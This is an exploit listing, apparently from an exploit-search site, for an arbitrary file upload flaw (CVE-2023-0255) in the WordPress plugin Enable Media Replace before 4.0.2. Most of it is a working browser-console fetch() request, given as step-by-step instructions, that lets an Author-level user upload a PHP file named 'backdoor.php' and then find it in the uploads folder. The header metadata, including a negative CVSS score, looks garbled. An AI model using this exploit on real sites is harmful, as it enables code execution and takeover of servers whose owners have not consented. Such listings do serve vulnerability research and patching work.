Exploit for Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload CVE-2023-0255

Name: Exploit for Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload CVE-2023-0255
Rating: 5 (220 reviews)
2023-01-17 | CVSS -0.3
## https://sploitus.com/exploit?id=WPEX-ID:B0239208-1E23-4774-9B8C-9611704A07A0
1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php
2) Press on the new picture's thumbnail to see the attachment's details
3) Click on "Upload a new file", next to "Replace media"
4) Paste the following in your browser's developer console:

```
await fetch(document.forms[0].action, {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147",
        "Upgrade-Insecure-Requests": "1"
    },
    "body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n<?php phpinfo();\n\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"remove_bg\"\r\n\r\nyes\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"replace_type\"\r\n\r\nreplace_and_search\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"timestamp_replace\"\r\n\r\n2\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date\"\r\n\r\nJanuary 12, 2023\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_hour\"\r\n\r\n18\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_minute\"\r\n\r\n41\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date_formatted\"\r\n\r\n2023-01-12\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"location_dir\"\r\n\r\n2023/01\r\n-----------------------------294159958331225347843177109147--\r\n`,
    "method": "POST",
    "mode": "cors"
});
```

5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.